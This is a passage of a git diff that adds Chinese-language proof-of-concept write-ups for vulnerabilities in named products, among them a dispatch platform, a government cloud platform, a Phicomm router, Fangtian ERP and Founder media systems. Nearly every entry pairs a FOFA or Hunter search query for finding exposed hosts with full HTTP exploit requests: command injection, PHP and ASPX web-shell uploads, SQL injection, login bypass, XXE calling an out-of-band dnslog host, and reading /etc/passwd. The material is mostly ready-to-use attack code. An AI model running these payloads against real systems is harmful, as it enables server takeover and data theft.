PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + 
+![1704270043886-4f20f40a-90f9-4e95-9d1f-7ae37ddc22b0.png](./img/FQYE9MXMbjGWC4jB/1704270043886-4f20f40a-90f9-4e95-9d1f-7ae37ddc22b0-502208.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/letplgg87ootvc4x> \ No newline at end of file diff --git a/指挥调度平台send_fax存在远程命令执行漏洞.md b/指挥调度平台send_fax存在远程命令执行漏洞.md new file mode 100644 index 0000000..24f9115 --- /dev/null +++ b/指挥调度平台send_fax存在远程命令执行漏洞.md 
@@ -0,0 +1,51 @@ +# 指挥调度平台send_fax存在远程命令执行漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台send_fax存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>` ++ <font style="color:rgb(51, 51, 51);">特征</font> + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/ObPXNwJRo2S4XdO_/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-954994.png) + +# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font> +```plain +POST /api/client/fax/send_fax.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Content-Length: 29 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +fax_name=`whoami > 1.txt`.pdf +``` + +![1706073841954-f6338ebb-177f-401c-b470-20545bad6ec1.png](./img/ObPXNwJRo2S4XdO_/1706073841954-f6338ebb-177f-401c-b470-20545bad6ec1-509394.png) + +获取命令执行结果 + +```plain +GET /api/client/fax/1.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + 
+![1706073883647-6d19d499-6d63-4239-b337-f757006f5d16.png](./img/ObPXNwJRo2S4XdO_/1706073883647-6d19d499-6d63-4239-b337-f757006f5d16-090767.png) + +[福建科立讯通信-指挥调度平台-send-fax-远程命令执行.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222143771-9a0b3a4a-d028-4593-a184-ee7c7d7dad61.yaml) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ficwasc2nrssf2yb> \ No newline at end of file diff --git a/指挥调度平台task_uploadfile存在任意文件上传漏洞.md b/指挥调度平台task_uploadfile存在任意文件上传漏洞.md new file mode 100644 index 0000000..7024eb0 --- /dev/null +++ b/指挥调度平台task_uploadfile存在任意文件上传漏洞.md 
@@ -0,0 +1,54 @@ +# 指挥调度平台task_uploadfile存在任意文件上传漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台task_uploadfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/ZLm82UHYMYXi_L_H/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-336348.png) + +# 四、漏洞复现 +```plain +POST /api/client/task/uploadfile.php HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7 +Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71 +Content-Length: 374 + +------WebKitFormBoundary25qW4eG1Jt50iyf7 +Content-Disposition: form-data; name="uuid" + +1 +------WebKitFormBoundary25qW4eG1Jt50iyf7 +Content-Disposition: form-data; name="number" + +122 +------WebKitFormBoundary25qW4eG1Jt50iyf7 +Content-Disposition: form-data; name="uploadfile";filename="1.php" +Content-Type: image/jpg + +111 +------WebKitFormBoundary25qW4eG1Jt50iyf7-- +``` + +![1704270749752-fadb9dfe-fbd1-4e6d-b77a-4ab2dd541922.png](./img/ZLm82UHYMYXi_L_H/1704270749752-fadb9dfe-fbd1-4e6d-b77a-4ab2dd541922-339121.png) + +上传文件位置 + +```plain +/upload/task/9cba3789-1c28-4aea-a205-1eb5faa3f477.php +``` + +![1704270802457-10dfe6ec-c7d9-4a36-9180-3cb6475dbf93.png](./img/ZLm82UHYMYXi_L_H/1704270802457-10dfe6ec-c7d9-4a36-9180-3cb6475dbf93-507189.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hfduq1o9a7uh3hh3> \ No newline at end of file diff --git a/指挥调度平台usernumber存在SQL注入漏洞.md b/指挥调度平台usernumber存在SQL注入漏洞.md new file mode 100644 index 0000000..90689bf --- /dev/null +++ b/指挥调度平台usernumber存在SQL注入漏洞.md 
@@ -0,0 +1,45 @@ +# 指挥调度平台usernumber存在SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台usernumber存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/xEaSzFspIi7a8WRB/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-654779.png) + +# 四、漏洞复现 +```plain +POST /api/get_sos/items.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=4c1e6025b94bac25c4ec63e4affec7cd; authcode=3hqs +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 74 + +sign=7a6f931dde8e8aafbbfa4d2bcab475e6×tamp=1686020152221&usernumber=1' AND (SELECT 5464 FROM (SELECT(SLEEP(5)))FZxX) AND 'khLM'='khLM +``` + +![1701143980161-27f11348-a6a0-42f5-9252-b3d4379e63a7.png](./img/xEaSzFspIi7a8WRB/1701143980161-27f11348-a6a0-42f5-9252-b3d4379e63a7-804570.png) + +sqlmap + +```plain +sqlmap -r 2.txt --batch -p usernumber +``` + +![1701143998178-09bee0f6-0d3e-4ee7-a4dd-320c79bc10b4.png](./img/xEaSzFspIi7a8WRB/1701143998178-09bee0f6-0d3e-4ee7-a4dd-320c79bc10b4-121402.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rnocaiwi1rqd0dx5> \ No newline at end of file diff --git a/指挥调度平台zx_upload存在任意文件上传漏洞.md b/指挥调度平台zx_upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..cde6bec --- /dev/null +++ b/指挥调度平台zx_upload存在任意文件上传漏洞.md 
@@ -0,0 +1,50 @@ +# 指挥调度平台zx_upload存在任意文件上传漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台zx_upload存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/dtrlvvnt9GTXfWHv/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-007881.png) + +# 四、漏洞复现 +```plain +POST /custom/zx/upload.php HTTP/1.1 +Host: {hostname} +Content-Length: 180 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundarySwvD8hSn3Z0sHfMu +Content-Disposition: form-data; name="ulfile";filename="1.php" +Content-Type: image/png + +<?php echo 222*111;?> +------WebKitFormBoundarySwvD8hSn3Z0sHfMu-- +``` + +![1704271134372-bb98e096-7cfc-456f-b840-bd1829f83a8d.png](./img/dtrlvvnt9GTXfWHv/1704271134372-bb98e096-7cfc-456f-b840-bd1829f83a8d-238637.png) + +上传文件位置 + +```plain +/upload/1.php +``` + +![1704271164814-a0e390ba-a95a-471a-b3a3-79e8a379df27.png](./img/dtrlvvnt9GTXfWHv/1704271164814-a0e390ba-a95a-471a-b3a3-79e8a379df27-548553.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gpc8sz8begguncm0> \ No newline at end of file diff --git a/数字通云平台智慧政务setting存在文件上传漏洞.md b/数字通云平台智慧政务setting存在文件上传漏洞.md new file mode 100644 index 0000000..aa15d2f --- /dev/null +++ b/数字通云平台智慧政务setting存在文件上传漏洞.md 
@@ -0,0 +1,52 @@ +# 数字通云平台智慧政务setting存在文件上传漏洞 + +数字通云平台智慧政务setting存在文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```java +body="assets/8cca19ff/css/bootstrap-yii.css" +``` + +## poc + +获取cookie + +```javascript +POST /portal/default/login HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 + +userID=admin&flag=rone +``` + +携带cookie + +```javascript +POST /sys/mobile/setting HTTP/1.1 +Host: +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: your-cookie +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------318638034016337576332132513456 + +-----------------------------318638034016337576332132513456 +Content-Disposition: form-data; name="MobileApplication[cert]"; filename="1.php" +Content-Type: application/octet-stream + +<?php system("whoami");unlink(__FILE__);?> +-----------------------------318638034016337576332132513456-- +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409201619573.png) + +文件路径:`/static/seal/1.php` \ No newline at end of file diff --git a/数字通云平台智慧政务workflow存在SQL注入漏洞.md b/数字通云平台智慧政务workflow存在SQL注入漏洞.md new file mode 100644 index 0000000..855d104 --- /dev/null +++ b/数字通云平台智慧政务workflow存在SQL注入漏洞.md 
@@ -0,0 +1,43 @@ +# 数字通云平台智慧政务workflow存在SQL注入漏洞 + +数字通云平台 智慧政务 /workflow/query/index 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```java +body="assets/8cca19ff/css/bootstrap-yii.css" +``` + +## poc + +获取cookie + +```javascript +POST /portal/default/login HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 + +userID=admin&flag=rone +``` + +携带cookie进行注入 + +```javascript +GET /workflow/query/index?WfRtApplication%5Bselect_user%5D=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71786b7a71%2C%28SELECT%20%28ELT%285761=5761%2C1%29%29%29%2C0x7162717871%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29 HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Cookie: your-cookie +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: */* +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181346234.png) \ No newline at end of file diff --git a/数字通云平台的智慧政务系统存在登录绕过漏洞.md b/数字通云平台的智慧政务系统存在登录绕过漏洞.md new file mode 100644 index 0000000..44eec0e --- /dev/null +++ b/数字通云平台的智慧政务系统存在登录绕过漏洞.md 
@@ -0,0 +1,26 @@ +# 数字通云平台的智慧政务系统存在登录绕过漏洞 + +数字通云平台的智慧政务系统存在登录绕过漏洞,login接口中存在未授权访问默认cookie的风险,未经身份验证的远程攻击者可利用此漏洞伪造Cookie登录 + +## fofa + +```java +body="assets/8cca19ff/css/bootstrap-yii.css" +``` + +## poc + +```javascript +POST /portal/default/login HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 + +userID=admin&flag=rone +``` + diff --git a/斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md b/斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md new file mode 100644 index 0000000..a5eca5e --- /dev/null +++ b/斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md 
@@ -0,0 +1,33 @@ +# 斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞 + +# 一、漏洞简介 +斐讯路由器PHICOMM-FIR300M使用默认密码admin/admin登录后台后,系统管理的控制台功能虽然在前端过滤了敏感字符,但是在后端未对输入内容做校验,导致可抓包修改参数造成任意命令执行。 + +# 二、影响版本 ++ 斐讯路由器PHICOMM-FIR300M + +# 三、资产测绘 ++ hunter`web.title=="FIR300M"` ++ 特征 + +![1699457151559-09e05449-f72f-444e-ab18-1178bd684415.png](./img/MQdwvYp3bC36b_KW/1699457151559-09e05449-f72f-444e-ab18-1178bd684415-100943.png) + +# 四、漏洞复现 +1.使用默认密码`admin/admin`登录路由器 + +![1699457195498-1b5878db-d293-4f80-a29c-99b09d3f2026.png](./img/MQdwvYp3bC36b_KW/1699457195498-1b5878db-d293-4f80-a29c-99b09d3f2026-944268.png) + +2. `系统工具`->`系统诊断` + +![1699457245475-e8944ca0-334f-4962-8ba4-091d17e18af1.png](./img/MQdwvYp3bC36b_KW/1699457245475-e8944ca0-334f-4962-8ba4-091d17e18af1-928663.png) + +3. 修改ip地址为`8.8.8.8`,使用burp抓包,修改`pingAddr`参数为`ip|ls`后放行 + +![1699457354699-61ddc345-a148-4ab5-ab04-3677a181f8a9.png](./img/MQdwvYp3bC36b_KW/1699457354699-61ddc345-a148-4ab5-ab04-3677a181f8a9-455575.png) + +![1699457718292-c9b1e951-6beb-42e1-b9bc-b5f630631da3.png](./img/MQdwvYp3bC36b_KW/1699457718292-c9b1e951-6beb-42e1-b9bc-b5f630631da3-598437.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgwam74g3eagpt5z> \ No newline at end of file diff --git a/方天云ERP系统GetCompanyItem存在SQL注入漏洞.md b/方天云ERP系统GetCompanyItem存在SQL注入漏洞.md new file mode 100644 index 0000000..f66b388 --- /dev/null +++ b/方天云ERP系统GetCompanyItem存在SQL注入漏洞.md 
@@ -0,0 +1,37 @@ +# 方天云ERP系统GetCompanyItem存在SQL注入漏洞 + +# 一、漏洞简介 +方天软件以云ERP+MES产品为核心,整合设备层的工业数据,提供软硬件智能+整合方案服务,赋能数字工厂新智造。在模具制造、五金机械、塑胶成型、电子组装等行业成效显著,包括财富500强的企业也正在通过方天软件的综合管理方案而持续获益。方天云ERP系统GetCompanyItem存在SQL注入漏洞 + +# 二、影响版本 ++ 方天云ERP + +# 三、资产测绘 ++ fofa`body="AjaxMethods.asmx/GetCompanyItem"` ++ 特征 + +![1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c.png](./img/YeZr3L9ppZ9Vc3mW/1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c-141307.png) + +# 四、漏洞复现 +```plain +POST /AjaxMethods.asmx/GetCompanyItem HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Cookie: ASP.NET_SessionId=scc55sifm4qstcyuiswqqeqi +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 +X-Requested-With: XMLHttpRequest +Content-Type: application/json + +{"cusNumber":"' UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(67)+CHAR(77)+CHAR(115)+CHAR(70)+CHAR(73)+CHAR(116)+CHAR(80)+CHAR(87)+CHAR(71)+CHAR(120)+CHAR(69)+CHAR(70)+CHAR(120)+CHAR(74)+CHAR(82)+CHAR(109)+CHAR(97)+CHAR(84)+CHAR(66)+CHAR(100)+CHAR(78)+CHAR(119)+CHAR(110)+CHAR(66)+CHAR(103)+CHAR(74)+CHAR(69)+CHAR(84)+CHAR(107)+CHAR(109)+CHAR(119)+CHAR(121)+CHAR(113)+CHAR(120)+CHAR(70)+CHAR(101)+CHAR(102)+CHAR(101)+CHAR(122)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)-- cRcq"} +``` + +![1721917285475-ecb66d9f-28c3-4ac1-a9cf-edf4fc760ab8.png](./img/YeZr3L9ppZ9Vc3mW/1721917285475-ecb66d9f-28c3-4ac1-a9cf-edf4fc760ab8-788954.png) + + + +> 更新: 2024-08-12 17:29:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bh8s1goi997wx46g> \ No newline at end of file diff --git a/方天云ERP系统GetSalQuatation存在SQL注入漏洞.md b/方天云ERP系统GetSalQuatation存在SQL注入漏洞.md new file mode 100644 index 0000000..8c97eb5 --- /dev/null 
+++ b/方天云ERP系统GetSalQuatation存在SQL注入漏洞.md @@ -0,0 +1,35 @@ +# 方天云ERP系统GetSalQuatation存在SQL注入漏洞 + +# 一、漏洞简介 +方天软件以云ERP+MES产品为核心,整合设备层的工业数据,提供软硬件智能+整合方案服务,赋能数字工厂新智造。在模具制造、五金机械、塑胶成型、电子组装等行业成效显著,包括财富500强的企业也正在通过方天软件的综合管理方案而持续获益。方天云ERP系统GetSalQuatation存在SQL注入漏洞 + +# 二、影响版本 ++ 方天云ERP + +# 三、资产测绘 ++ fofa`body="AjaxMethods.asmx/GetCompanyItem"` ++ 特征 + +![1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c.png](./img/yhcb6CmmIQ6EhV3S/1721917258848-b78e31a2-e470-4ebe-99f8-ec99e64af05c-958500.png) + +# 四、漏洞复现 +```http +POST /AjaxMethods.asmx/GetSalQuatation HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Connection: close + +{ID:"(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8725=8725) THEN @@VERSION ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113))"} +``` + +![1722875878230-07abf756-4be9-48ca-bc05-da4b330c98b3.png](./img/yhcb6CmmIQ6EhV3S/1722875878230-07abf756-4be9-48ca-bc05-da4b330c98b3-789078.png) + + + +> 更新: 2024-08-12 17:29:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgp6fcox304sdet3> \ No newline at end of file diff --git a/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md b/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md new file mode 100644 index 0000000..a3b57be --- /dev/null +++ b/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md 
@@ -0,0 +1,31 @@ +# 方天云智慧平台系统setImg.ashx存在文件上传漏洞 + +方天云智慧平台系统 setImg.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```java +body="AjaxMethods.asmx/GetCompanyItem" +``` + +## poc + +```java +POST /Data/setImg.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=----21909179191068471382830692394 +Connection: close + +------21909179191068471382830692394 +Content-Disposition: form-data; name="Filedata"; filename="asd.aspx" +Content-Type: image/jpeg + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------21909179191068471382830692394-- +``` + +文件路径`http://ip/UploadFile/CustomerFile/回显路径` \ No newline at end of file diff --git a/方正全媒体采编系统存在syn.do信息泄露漏洞.md b/方正全媒体采编系统存在syn.do信息泄露漏洞.md new file mode 100644 index 0000000..d2dec54 --- /dev/null +++ b/方正全媒体采编系统存在syn.do信息泄露漏洞.md 
@@ -0,0 +1,22 @@ +# 方正全媒体采编系统存在syn.do信息泄露漏洞 + +方正全媒体采编系统存在syn.do信息泄露漏洞,攻击者可以查看到平台中所有用户的用户名。 + +## fofa + +```yaml +app="FOUNDER-全媒体采编系统" +``` + +## poc + +```java +GET /newsedit/assess/syn.do?type=org HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Content-Length: 185Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +``` + +![image-20240816100116204](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408161001270.png) \ No newline at end of file diff --git a/方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md b/方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md new file mode 100644 index 0000000..71ae373 --- /dev/null +++ b/方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md @@ -0,0 +1,26 @@ +## 方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞 + +方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。 + +## fofa + +```javascript +app="FOUNDER-全媒体采编系统" +``` + +## poc + +```javascript +POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Content-Type: application/x-www-form-urlencoded +Connection: close + +xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://11111111111.m9cp0s.dnslog.cn%22%3E%20%25remote;%5D%3E +``` + +![image-20241012131400968](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121314025.png) diff --git a/方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md b/方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md new file mode 100644 index 0000000..a4d2a57 --- /dev/null +++ b/方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md 
@@ -0,0 +1,26 @@ +# 方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞 + +方正畅享全媒体新闻采编系统 imageProxy.do 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 + +## fofa + +```javascript +app="FOUNDER-全媒体采编系统" +``` + +## poc + +```javascript +POST /newsedit/outerfotobase/imageProxy.do HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: text/plain, */*; q=0.01 + +oriImgUrl=file:///etc/passwd +``` + +![image-20250103100410296](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031004386.png) \ No newline at end of file diff --git a/方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md b/方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md new file mode 100644 index 0000000..4c4a8bd --- /dev/null +++ 